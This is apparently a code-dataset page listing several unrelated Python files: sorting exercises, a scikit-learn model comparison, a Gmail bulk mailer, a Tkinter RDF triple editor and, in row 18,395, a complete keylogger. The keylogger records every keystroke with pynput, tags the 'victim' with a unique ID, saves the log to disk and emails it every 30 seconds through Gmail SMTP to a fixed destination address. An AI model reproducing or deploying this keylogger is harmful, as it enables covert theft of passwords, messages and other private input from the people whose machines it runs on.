    a = [4, 7, 2, 8, 9, 21]
    # BUG FIX: merge_sort_c sorts the half-open range [p, q), so sorting
    # the whole list needs q == len(a). The original passed len(a) - 1,
    # which silently left the last element out of the sort.
    merge_sort_c(a, 0, len(a))
    print(a)
|
18,394 | e81aba44b85c6b78e75fbd888b634fc29f5c35e7 | from .coda import Coda, Document, Table, Row, Column, Cell
|
18,395 | 764211c6a25f022a2c02565745e1f99f24459bc0 | from pynput.keyboard import Listener
import os
import time
import _thread
import tempfile
import uuid
import smtplib, ssl
from email.message import EmailMessage
# Temp Content Path
logFile = 'data.txt'
# Victim Unique ID
unique_id_file = tempfile.gettempdir() + '/kl_unique_id.bin'
client_unique_id = None
indexer = 1
# Keyboard Buffer
buffer = []
# SMTP Settings
smtp_server = "smtp.gmail.com"
smtp_port = 587
sender_email = "foo@provider"
smtp_password = "fooPassword"
destination_address = "foo_destination@provider"
def send_buffer_to_email():
print("[+] send_buffer_to_email enter")
while True:
time.sleep(30)
# Create a secure SSL context
context = ssl.create_default_context()
global buffer
global indexer
# Try to log in to server and send email
try:
server = smtplib.SMTP(smtp_server, smtp_port)
server.ehlo() # Can be omitted
server.starttls(context=context) # Secure the connection
server.ehlo() # Can be omitted
server.login(sender_email, smtp_password)
msg = EmailMessage()
msg.set_content(''.join(buffer))
if len(buffer) > 1000000:
# Reset Buffer
buffer = []
indexer = 1
else:
indexer += 1
msg['Subject'] = f'{client_unique_id} - Event ID: {indexer}'
msg['From'] = sender_email
msg['To'] = destination_address
server.send_message(msg)
print("[*] Send Mail OK")
except Exception as e:
print(e)
finally:
server.quit()
def init_unique_client_id():
'''Initializes the Unique Client ID.'''
print("[+] init_unique_client_id enter")
global client_unique_id
if not os.path.exists(unique_id_file):
client_unique_id = uuid.uuid4().hex.upper()
with open(unique_id_file, 'w') as file:
file.write(client_unique_id)
file.flush()
os.fsync(file.fileno())
file.close()
else:
with open(unique_id_file, 'r') as file:
client_unique_id = file.read()
file.close()
print("[+] MY ID=" + client_unique_id)
def write_to_disk():
print("[+] write_to_disk enter")
while True:
with open(logFile, "w") as file:
file.write(''.join(buffer))
file.flush()
os.fsync(file.fileno())
file.close()
time.sleep(1)
def writeLog(key):
'''Dumps Buffer to File'''
translate_keys = {
"Key.space": " ",
"Key.shift_r": "<SHIFT_R>",
"Key.shift_l": "<SHIFT_L>",
"Key.shift": "<SHIFT>",
"Key.enter": "\n",
"Key.alt_l": "<ALT_L>",
"Key.alt_r": "<ALT_R>",
"Key.ctrl_l": "<CTRL_L>",
"Key.ctrl_r": "<CTRL_R>",
"Key.ctrl": "<CTRL>",
"Key.esc": "<ESC>",
"Key.cmd": "<CMD>",
"Key.caps_lock": "<TOGGLE_CAPS_LOCK>",
"Key.tab": "<TAB>",
"Key.backspace": "<BACKSPACE>",
"Key.end": "<END>",
"Key.down": "<DOWN>",
"Key.up": "<UP>",
"Key.right": "<RIGHT>",
"Key.left": "<LEFT>",
"Key.num_lock": "<NUM_LOCK>",
"Key.caps_lock": "<CAPS_LOCK>",
}
keydata = str(key)
keydata = keydata.replace("'", "")
for key in translate_keys:
keydata = keydata.replace(key, translate_keys[key])
buffer.append(keydata)
def __main__():
init_unique_client_id()
_thread.start_new_thread(write_to_disk, ())
_thread.start_new_thread(send_buffer_to_email, ())
# Start Listener
with Listener(on_press=writeLog) as l:
l.join()
if __name__ == '__main__':
print('''
_______ _ ____ ___ _ _
|__ __|| | |___ \ / _ \ | | | |
| | | |__ __) | | | | || |__ ___ ___ _ __ __ __ __ _ | |_ ___ _ __
| | | '_ \ |__ < | | | || '_ \ / __| / _ \| '__|\ \ / // _` || __|/ _ \ | '__|
| | | | | | ___) | | |_| || |_) |\__ \| __/| | \ V /| (_| || |_| (_) || |
|_| |_| |_||____/ \___/ |_.__/ |___/ \___||_| \_/ \__,_| \__|\___/ |_|
_ __ _
| |/ / | |
| ' / ___ _ _ | | ___ __ _ __ _ ___ _ __
| < / _ \| | | || | / _ \ / _` | / _` | / _ \| '__|
| . \| __/| |_| || |____| (_) || (_| || (_| || __/| |
|_|\_\\___| \__, ||______|\___/ \__, | \__, | \___||_|
__/ | __/ | __/ |
|___/ |___/ |___/
''')
__main__()
|
18,396 | 2f66cd80dc0764a996f4bddc2b4a3c83779de2c4 | import pandas
import matplotlib.pyplot as plt
from sklearn import model_selection
from sklearn.linear_model import LogisticRegression
from sklearn.tree import DecisionTreeClassifier
from sklearn.neighbors import KNeighborsClassifier
from sklearn.discriminant_analysis import LinearDiscriminantAnalysis
from sklearn.naive_bayes import GaussianNB
from sklearn.svm import SVC
# Compare four classifiers on the Pima Indians diabetes dataset by
# 10-fold cross-validated accuracy.
# NOTE(review): plt, LogisticRegression, LinearDiscriminantAnalysis and
# the ``seed`` variable below are imported/defined but never used.
# load dataset
url = "/Users/HP/Desktop/S4/Machine Learning/Dataset/pima-indians-diabetes.csv"
names = ['preg', 'plas', 'pres', 'skin', 'test', 'mass', 'pedi', 'age', 'class']
dataframe = pandas.read_csv(url, names=names)
array = dataframe.values
X = array[:,0:8]  # the eight feature columns
Y = array[:,8]  # the class label column
# prepare configuration for cross validation test harness
seed = 7
# prepare models
models = []
models.append(('KNN', KNeighborsClassifier()))
models.append(('CART', DecisionTreeClassifier()))
models.append(('NB', GaussianNB()))
models.append(('SVM', SVC()))
# evaluate each model in turn
results = []
names = []
scoring = 'accuracy'
print('Algorithm Comparison(accuracy)')
for name, model in models:
    kfold = model_selection.KFold(n_splits=10, random_state=None)
    cv_results = model_selection.cross_val_score(model, X, Y, cv=kfold, scoring=scoring)
    results.append(cv_results)
    names.append(name)
    # Report mean and standard deviation of the 10 fold scores.
    msg = "%s: %f (%f)" % (name, cv_results.mean(), cv_results.std())
    print(msg)
|
18,397 | e736d164423b1dbc6c35207bc9b5e2fd27bd78b8 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Tue Jan 23 23:13:48 2018
@author: fubao
"""
# 75. Sort Colors
#facebook
'''
Given an array with n objects colored red, white or blue, sort them so that objects of the same color are adjacent, with the colors in the order red, white and blue.
Here, we will use the integers 0, 1, and 2 to represent the color red, white, and blue respectively.
Note:
You are not suppose to use the library's sort function for this problem.
'''
class Solution(object):
    def sortColors(self, nums):
        """
        Sort an array of 0s, 1s and 2s (red/white/blue) in place, one pass.

        Dutch national flag partition: ``low`` marks the end of the
        settled 0-block, ``high`` marks the start of the settled 2-block,
        and ``i`` scans the unknown middle region. Invariant:
        nums[:low] == 0s, nums[low:i] == 1s, nums[high+1:] == 2s.

        :type nums: List[int]
        :rtype: void Do not return anything, modify nums in-place instead.
        """
        low, i, high = 0, 0, len(nums) - 1
        while i <= high:
            value = nums[i]
            if value == 0:
                # Swap the 0 into the left block; what comes back is a 1
                # (or i == low), so the scanner may advance.
                nums[i], nums[low] = nums[low], nums[i]
                low += 1
                i += 1
            elif value == 2:
                # Swap the 2 into the right block; the element swapped
                # back is unexamined, so re-check position i.
                nums[i], nums[high] = nums[high], nums[i]
                high -= 1
            else:
                # A 1 is already in its final region.
                i += 1
18,398 | eb3df8715f5d7dd5ae5cfb18d10260c31b684b55 | import pandas as pd
import smtplib
# Bulk personalised mail sender: reads one row per recipient
# (Name / Email / Subject / Message columns) from an Excel file and
# sends each message through Gmail's implicit-SSL SMTP endpoint (465).
#sender details
your_name = input("Enter your name:")
your_email = input("Enter your Email:")
your_password = input("Enter password:")
#setting up the connection
server = smtplib.SMTP_SSL('smtp.gmail.com', 465)
server.ehlo()
server.login(your_email, your_password)
#file information
file = input("Enter filename")
email_list = pd.read_excel(file)
#getting all the email infos
all_names = email_list['Name']
all_emails = email_list['Email']
all_subjects = email_list['Subject']
all_messages = email_list['Message']
for idx in range(len(all_emails)):
    name = all_names[idx]
    email = all_emails[idx]
    subject = all_subjects[idx]
    message = all_messages[idx]+"\nThis is a system generated mail, Please "+name+" do not reply\n"
    # Build the raw message by hand: headers, a blank line, then the body.
    full_email = ("From: {0} <{1}>\n"
                  "To: {2} <{3}>\n"
                  "Subject: {4}\n\n"
                  "{5}"
                  .format(your_name, your_email, name, email, subject, message))
    # A failure for one recipient is reported but does not stop the rest.
    try:
        server.sendmail(your_email, [email], full_email)
        print('Email to {} successfully sent!\n\n'.format(email))
    except Exception as e:
        print('Email to {} could not be sent :( because {}\n\n'.format(email, str(e)))
server.close()
|
18,399 | 3bd0eee8808ca768efb18de85874700e29731157 | # import all the modules
from tkinter import *
import tkinter.messagebox
import json
from rdflib import Graph, Literal
from app import replace_triple, add_triple, remove_triple, get_all_triples, read_base_json, save_base_json
class Database:
    """Tkinter form for looking up an RDF triple by id and updating it
    in the dinos.json knowledge base."""
    def __init__(self, master, *args, **kwargs):
        # Build the static layout: background canvas, heading, the id
        # search row, and three entry fields for subject/type/target.
        self.master = master
        self.canvas = Canvas(width=1366, height=768, bg='pink')
        self.canvas.pack()
        self.heading = Label(master, text="Update Triple", font=('Helvetica', 35, 'bold', 'italic'), bg='pink', fg='black')
        self.heading.place(x=100, y=0)
        # label and entry for id
        self.id_le = Label(master, text="Enter ID", font=('Helvetica', 10, 'bold'), bg='pink', fg='black')
        self.id_le.place(x=0, y=70)
        self.id_leb = Entry(master, font=('Helvetica', 10), width=10)
        self.id_leb.place(x=380, y=70)
        self.btn_search = Button(master, text="Search", width=8, height=0, bg='sky blue', command=self.search)
        self.btn_search.place(x=500, y=70)
        # lables for the window
        # NOTE(review): the Label widgets assigned to self.first/last/gender
        # are immediately overwritten by the Entry widgets below; the labels
        # stay visible on screen but are no longer referenced.
        self.first = Label(master, text="Enter Subject", font=('Helvetica', 10, 'bold'), bg='pink', fg='black')
        self.first.place(x=0, y=120)
        self.last = Label(master, text="Enter Type", font=('Helvetica', 10, 'bold'), bg='pink', fg='black')
        self.last.place(x=0, y=170)
        self.gender = Label(master, text="Enter Target ", font=('Helvetica', 10, 'bold'), bg='pink', fg='black')
        self.gender.place(x=0, y=220)
        # enteries for window
        self.first = Entry(master, width=25, font=('Helvetica', 10, 'bold'))
        self.first.place(x=380, y=120)
        self.last = Entry(master, width=25, font=('Helvetica', 10, 'bold'))
        self.last.place(x=380, y=170)
        self.gender = Entry(master, width=25, font=('Helvetica', 10, 'bold'))
        self.gender.place(x=380, y=220)
        # button to add to the database
        self.btn_add = Button(master, text='Update Triple', width=27, height=1, bg='sky blue', fg='black',
                              command=self.update)
        self.btn_add.place(x=380, y=420)
        # Load the graph and its backing JSON document once at startup.
        self.g, self.data = read_base_json('data/dinos.json')
    def search(self, *args, **kwargs):
        """Find the triple whose id matches the id entry and copy its
        three components into the edit fields (and onto self.n1..n3)."""
        triples = get_all_triples(self.g, self.data)
        triple = list()
        print(triples)
        for item in triples:
            if str(item[0]) == self.id_leb.get():
                triple = item
                break
        print(triple)
        # NOTE(review): if no row matches the entered id, ``triple`` stays
        # an empty list and the indexing below raises IndexError.
        self.n1 = triple[1]
        self.n2 = triple[2]
        self.n3 = triple[3]
        # inster into the enteries to update
        self.first.delete(0, END)
        self.first.insert(0, str(self.n1))
        self.last.delete(0, END)
        self.last.insert(0, str(self.n2))
        self.gender.delete(0, END)
        self.gender.insert(0, str(self.n3))
    def update(self, *args, **kwargs):
        """Replace the previously searched triple (self.n1..n3) with the
        current entry-field values and persist the graph to disk."""
        triple_new = list()
        triple_new.append(self.first.get())
        triple_new.append(self.last.get())
        triple_new.append(self.gender.get())
        triple_old = list()
        triple_old.append(self.n1)
        triple_old.append(self.n2)
        triple_old.append(self.n3)
        print(triple_old, triple_new)
        replace_triple(self.g, triple_old, triple_new)
        tkinter.messagebox.showinfo("Success", "Updated Triple successfully")
        save_base_json(self.g, self.data, 'data/dinos.json')
# Build the Tk root window, attach the update-triple form, and enter the
# Tk event loop (blocks until the window is closed).
root = Tk()
b = Database(root)
root.geometry("1000x760+0+0")
root.title("Update Triple Information")
root.mainloop()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.